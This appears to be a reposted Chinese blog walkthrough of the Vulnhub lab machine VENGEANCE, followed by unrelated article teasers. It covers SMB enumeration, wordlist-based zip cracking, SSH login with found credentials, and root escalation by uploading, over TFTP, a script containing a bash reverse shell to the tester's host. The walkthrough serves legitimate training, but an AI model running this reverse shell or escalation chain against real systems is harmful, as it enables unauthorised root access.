Vulnhub-DIGITALWORLD.LOCAL: VENGEANCE渗透

文章目录

  • 前言
    • 1、靶机ip配置
    • 2、渗透目标
    • 3、渗透概括
  • 开始实战
    • 一、信息获取
    • 二、smb下载线索
    • 三、制作字典
    • 四、爆破压缩包密码
    • 五、线索分析
    • 六、提权!!!

Vulnhub靶机:DIGITALWORLD.LOCAL: VENGEANCE ( digitalworld.local: VENGEANCE ) 渗透测试

前言

由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主
 如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!

 👉本文靶机下载连接-戳我直接下载!👈

1、靶机ip配置

  • Kali IP: 192.168.100.128
  • 靶机IP: 192.168.100.131
    靶机ip获取方式如下图(PS:该靶机用VirtualBox打开可能获取不到IP地址,所以使用的VMware打开的,因为博主这边的kali是用的两个网卡,所以加了一个参数 '--interface eth1' ,如果大家是只有一个网卡的话,这个参数可以直接去掉)
    在这里插入图片描述

2、渗透目标

  • 获取shell权限!!!

3、渗透概括

  1. smb信息获取
  2. cewl工具的使用
  3. zip密码破解
  4. 对线索信息的分析
  5. tftp的使用
  6. 通过tftp传反弹shell,配合sudo提权


开始实战

一、信息获取

使用nmap工具对靶机做基本的信息收集nmap -sS -sV -A -T4 -p- 靶机IP如下所示

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -T4 -p- 192.168.100.131 Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-20 04:32 ESTNmap scan report for 192.168.100.131Host is up (0.0020s latency).Not shown: 65515 filtered tcp ports (no-response)PORT      STATE  SERVICE      VERSION7/tcp     closed echo22/tcp    closed ssh80/tcp    open   http         nginx 1.18.0 (Ubuntu)|_auth-owners: www-data|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...|_http-server-header: nginx/1.18.0 (Ubuntu)88/tcp    closed kerberos-sec110/tcp   open   pop3?113/tcp   open   ident?|_auth-owners: root139/tcp   open   netbios-ssn  Samba smbd 4.6.2|_auth-owners: root143/tcp   open   imap?161/tcp   closed snmp389/tcp   closed ldap443/tcp   open   ssl/http     nginx 1.18.0 (Ubuntu)|_ssl-date: TLS randomness does not represent time|_auth-owners: www-data| ssl-cert: Subject: commonName=VENGEANCE/organizationName=Good Tech Inc/stateOrProvinceName=Singapore/countryName=SG| Not valid before: 2021-02-14T02:40:28|_Not valid after:  2022-02-14T02:40:28|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...|_http-server-header: nginx/1.18.0 (Ubuntu)| tls-alpn: |   h2|_  http/1.1| tls-nextprotoneg: |   h2|_  http/1.1445/tcp   open   netbios-ssn  Samba smbd 4.6.2|_auth-owners: root993/tcp   open   imaps?995/tcp   open   pop3s?1337/tcp  closed waste2049/tcp  closed nfs6000/tcp  closed X118080/tcp  closed http-proxy22222/tcp open   ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)|_auth-owners: root| ssh-hostkey: |   3072 32:eb:05:fa:d3:75:45:5e:c7:72:fb:03:aa:05:b7:d7 (RSA)|   256 40:16:f8:d1:f1:06:e5:aa:13:44:28:ed:e0:55:ef:34 (ECDSA)|_  256 52:78:15:c2:3b:a1:90:20:3a:b1:d6:75:93:72:d8:f8 (ED25519)54321/tcp closed unknownMAC Address: 00:0C:29:12:9E:6D (VMware)Aggressive OS guesses: Linux 5.0 - 5.4 (98%), Linux 4.15 - 5.8 (93%), Linux 5.0 - 5.5 (93%), Linux 5.1 (93%), Linux 2.6.32 - 3.13 (93%), Linux 2.6.39 (93%), Linux 5.0 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 (91%), Linux 3.10 - 4.11 (90%)No exact OS matches for host (test conditions non-ideal).Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:| smb2-security-mode: |   3:1:1: |_    Message signing enabled but not required| smb2-time: |   date: 2024-02-20T09:36:35|_  start_date: N/ATRACEROUTEHOP RTT     ADDRESS1   2.03 ms 192.168.100.131OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 303.88 seconds

可以/看出扫出来的信息还是非常多的,那些被关闭的端口就先直接pass(大胆猜测可能需要敲门才能开,特别是那个54321端口),我们主要看大概率能利用并且开放的端口,如下

22222/sshssh的默认端口被改了,这个版本基本上没有什么可利用的漏洞了,一般获取到了用户信息才使用这个,先暂时pass掉

139/smb文件共享服务samba,在这个服务上面可以试试看能不能获取到一些敏感文件

80/http和443/https基本上大部分的漏洞都是存在于web服务上


使用enum4linux 192.168.100.131命令对smb服务进行枚举
发现了两个用户saraqinyi
在这里插入图片描述

还发现了Sara的共享文件sarapublic$
在这里插入图片描述

二、smb下载线索

我们再使用命令smbclient //192.168.100.131/sarapublic$进入到这个共享目录的命令行
发现里面有很多的文件,我们把它们下载到本地看看
在这里插入图片描述

我们下载该目录的所有文件至本地
我们使用如下命令对其进行下载

smb: \> recurse on		#打开递归模式,使mget可以递归下载
smb: \> prompt off		#关闭交互,不需要输入y/n进行确认
smb: \> mget *			#下载当前目录的所有文件

在这里插入图片描述

如下所示,使用exit退出smb命令行,可以看到所有的文件都已经下载到我们的本地目录了
并且smb上的所有文件都已经下载下来了
在这里插入图片描述

三、制作字典

里面有一个压缩包,但是需要密码,直接用john爆破了很久没有结果
在这里插入图片描述

还有两个文件夹champagnecognac,其中cognac里面是一个文本文件,champagne里面是一个域名,看起来是一个网站里面的源文件,最显著的特征就是robots.txt的爬虫文件
在这里插入图片描述

除开两个文件夹和压缩包,其他的几乎都是文本文件
ps:感兴趣的朋友可以看看这些文件里面的内容,里面会提供一定的线索
在这里插入图片描述

我们可以换一个思路,下载下来的文件有很多文本文件,看似都没有什么用,我们可以使用cewl工具对这个这些文本文件里面的内容进行密码组装,来制作一个字典
先使用如下命令组合一下这些文本文件,并保存到info.txt文件中

cat blurb.txt eaurouge eaurouge.txt essay.txt profile.txt > info.txt

在这里插入图片描述

由于cewl工具的目标是web上的信息,所以我们得给这个工具传url
我们使用如下命令,使用python工具开启一个目录简单得web服务,再使用cewl爬取这个info.txt文件内得信息,并且重定向到passwd.txt的密码文件

python3 -m http.server -b 192.168.100.128 80 &; cewl 192.168.100.128/info.txt > passwd.txt

在这里插入图片描述

四、爆破压缩包密码

我们再使用zip2john工具对这个加密的gio.zip压缩文件提取密文,并将提取出的内容保存到burpfile文件
在这里插入图片描述

再使用john --wordlist=passwd.txt burpfile爆破该压缩包密码
如下所示爆出来的密码为nanotechnological
在这里插入图片描述

里面给了一个大爷的图片tryharder.png和一个pptted_talk.pptx,还有一个密码提醒文件pass_reminder.txt
在这里插入图片描述

五、线索分析

我们打开这个密码提示文件
如下图所示,可以大胆的猜测这可能是一个密码的格式
名字_弯道(拐角)_路线
在这里插入图片描述

密码的格式给了,我们现在看看这个ppt里面的内容
在第一页发现了一个名字Giovanni Berlusconi,先记录一下
在这里插入图片描述

在第三页里发现了一个地址信息Suzuka 130R
在这里插入图片描述

现在我们整理我们获得的信息

两个用户: saraqinyi
名字: Giovanni Berlusconi
地址: Suzuka 130R

我们直接用ssh去连接,通过不断的尝试,最终得到了正确的用户名qinyi和密码giovanni_130R_Suzuka
在这里插入图片描述

六、提权!!!

我们用sudo -l命令看一下
发现了在sara用户目录下的eaurouge文件是以root权限运行的
我们虽然可以以sudo的权限执行,但是直接进/home/sara/private目录看这个文件是没有权限的,所以我们要想其他的办法
在这里插入图片描述

我们使用ps -aux命令看一下进程
如下图发下了一个tftp服务,并且监听地址是69,路径是/home/sara/private
我们来了解一下tftptftp和ftp实现的功能差不多,只不过tftp使用的udp协议,并且监听的端口一般是udp的69
在这里插入图片描述

那么我们可以使用tftp服务将eaurouge下载下来看看
通过如下命令下载
在这里插入图片描述

分析这个文件里面的内容
是一个sh脚本,功能就是在touch /home/sara/public/目录下创建一个test.txt文件
并且修改相应的权限,还有文件内容
在这里插入图片描述

那么这就好办了
我们直接更改这个文件,将反弹shell的代码植入进去,然后再执行这个文件即可获取到root权限
我们修改我们下载下来的eaurouge文件改为如下内容

#!/bin/bash/bin/bash -i >& /dev/tcp/192.168.100.128/1234 0>&1

在这里插入图片描述

再将这个文件上传上去
在这里插入图片描述

然后使用nc -lvvp 1234监听反弹shell
在这里插入图片描述

最后我们在靶机上通过如下命令执行我们含有反弹shell的文件

sudo /home/sara/private/./eaurouge

在这里插入图片描述

这个时候我们可以看到我们kali监听的端口就收到了靶机的shell,并且是root权限
至此我们的渗透已经完成,该靶机没有flag文件,所以就直接结束啦!
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/6191.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【linux】初步认识文件系统

初步认识文件系统 前置知识的简单了解简单回顾C语言的文件操作stdin&stdout&stderr 系统文件IOopen函数的返回值文件描述符fd打开文件背后的操作文件描述符的分配规则 前置知识的简单了解 文件包括了文件内容和文件属性两个部分(文件内容顾名思义就是文件里面的数据等…

tomcat启动闪退问题解决方法

文章目录 Tomcat启动闪退的常见问题及解决方法Tomcat是什么启动闪退的常见问题及解决方法1. 内存不足问题描述:案例分析:解决方法: 2. 端口冲突问题描述:解决方法: 3. 日志错误问题描述:解决方法&#xff1…

冰蓄冷系统基础知识

冰蓄冷是将水制成冰储存冷量,它是潜热蓄冷的一种方式。当压力保持不变时,物质在相变过程中保持恒定温度并吸收或释放热量,通常把这个温度称为相变温度(即溶解温度或凝固温度),把吸收或释放的热量称相变潜热。在常压下,…

基于Python的LSTM网络实现单特征预测回归任务(TensorFlow)

目录 一、数据集 二、任务目标 三、代码实现 1、从本地路径中读取数据文件 2、数据归一化 3、创建配置类,将LSTM的各个超参数声明为变量,便于后续使用 4、创建时间序列数据 5、划分数据集 6、定义LSTM网络 (1)创建顺序模…

一、初识VUE

一、初识VUE 二、再识VUE-MVVM 三、VUE数据代理 Vue Vue (读音 /vjuː/,类似于 view) 是一套用于构建用户界面的渐进式框架。与其它大型框架不同的是,Vue 被设计为可以自底向上逐层应用。Vue 的核心库只关注视图层,不仅易于上手&#xff0c…

MySQL常见问题解决和自动化安装脚本

常见问题 MySQL密码正确但无法登录的情况 这种情况一般都是因为缓存,使用mysql -u root -p123456直到成功登陆为止,并且进入之后重新修改密码,多次重复修改密码的命令并且再一次清除缓存后退出。 ALTER USER rootlocalhost IDENTIFIED WIT…

基于Unity+Vue通信交互的WebGL项目实践

unity-webgl 是无法直接向vue项目进行通信的,需要一个中间者 jslib 文件 jslib当作中间者,unity与它通信,前端也与它通信,在此基础上三者之间进行了通信对接 看过很多例子:介绍的都不是很详细,不如自己写&…

【MATLAB源码-第199期】基于MATLAB的深度学习(CNN)数字、模拟调制识别仿真,输出识别率。

操作环境: MATLAB 2022a 1、算法描述 基于深度学习的调制识别系统利用复杂的数学模型和算法来识别和分类从不同来源接收到的无线信号的调制类型。这种技术的应用广泛,特别是在无线通信、电子战、频谱监测和认知无线电等领域中具有重要价值。调制识别系…

算法导论 总结索引 | 第三部分 第十二章:二叉搜索树

1、搜索树数据结构 支持 许多动态集合操作,包括 SEARCH、MINIMUM、MAXIMUM、PREDECESSOR、SUCCESSOR、INSERT 和 DELETE 等。使用搜索树 既可以作为一个字典 又可以作为一个优先队列 2、二叉搜索树上的基本操作 所花费的时间 与这棵树的高度成正比。对于有n个结点的…

汽车热辐射、热传导、热对流模拟加速老化太阳光模拟器系统

汽车整车结构复杂,材料种类繁多,在使用过程中会面临各种严酷气候环境的考验,不可避免会出现零部件材料老化、腐蚀等不良现象,从而影响汽车的外观、功能,甚至产生安全隐患。因此,分析汽车零部件材料老化腐蚀…

深入剖析Tomcat(五) 剖析Servlet容器并实现一个简易Context与Wrapper容器

上一章介绍了Tomcat的默认连接器,后续程序都会使用默认连接器。前面有讲过Catalina容器的两大块内容就是连接器与Servlet容器。不同于第二章的自定义丐版Servlet容器,这一章就来探讨下Catalina中的真正的Servlet容器究竟长啥样。 四种容器 在Catalina中…

音视频入门基础:像素格式专题(1)——RGB简介

一、像素格式简介 像素格式(pixel format)指像素色彩按分量的大小和排列。这种格式以每个像素所使用的总位数以及用于存储像素色彩的红、绿、蓝和 alpha 分量的位数指定。在音视频领域,常用的像素格式包括RGB格式和YUV格式,本文…

【海博】雅思该怎么练?

文章目录 前言 备考计划 模拟考试 参考资料 前言 见《【海博】浅析海博深造》 见《【海博】雅思和托福该考哪个?》 见《【海博】雅思该怎么考?》 见《【海博】雅思考什么?》 备考计划 第一周确定你的目标考试分数。 做一套雅思模拟试题&…

npm install报错

总结:没有安装visual studio 2017以上带有C桌面开发的版本 #开始试错 #报错总信息mingw_x64_win版本 百度网盘链接: link 提取码:3uou #尝试用mingw配置个C编译器,并配置环境变量,失败 #只认可使用VS!GIthub原址: 链接: link 上…

python公务用车医院校园企业车辆管理系统

本 Python版本:python3.7 前端:vue.jselementui 框架:django/flask都有,都支持 后端:python 数据库:mysql 数据库工具:Navicat 开发软件:PyCharm 公务用车管理智慧云服务监管平台有管理员和用户…

java中的字节流和File类

目录 正文: 1.File类 1.1概述 1.2常用方法 2.FileInputStream 2.1概述 2.2常用方法 3.FileOutputStream 3.1概述 3.2常用方法 总结: 正文: 1.File类 1.1概述 File类是Java中用来表示文件或目录的类,它提供了一系列方…

【项目学习01_2024.05.02_Day04】

学习笔记 4 课程分类查询4.1需求分析4.2 接口定义4.3 接口开发4.3.1 树型表查询4.3.2 开发Mapper 4 课程分类查询 4.1需求分析 有课程分类的需求 course_category课程分类表的结构 这张表是一个树型结构,通过父结点id将各元素组成一个树。 利用mybatis-plus-gen…

Sass语法---sass的安装和引用

什么是Sass Sass(英文全称:Syntactically Awesome Stylesheets) Sass 是一个 CSS 预处理器。 Sass 是 CSS 扩展语言,可以帮助我们减少 CSS 重复的代码,节省开发时间。 Sass 完全兼容所有版本的 CSS。 Sass 扩展了…

centos7安装真的Redmine-5.1.2+ruby-3.0.0

下载redmine-5.1.2.tar.gz,上传到/usr/local/目录下 cd /usr/local/ tar -zxf redmine-5.1.2.tar.gz cd redmine-5.1.2 cp config/database.yml.example config/database.yml 配置数据连接 #编辑配置文件 vi config/database.yml #修改后的内容如下 product…

【介绍下Apache的安装与目录结构】

🎥博主:程序员不想YY啊 💫CSDN优质创作者,CSDN实力新星,CSDN博客专家 🤗点赞🎈收藏⭐再看💫养成习惯 ✨希望本文对您有所裨益,如有不足之处,欢迎在评论区提出…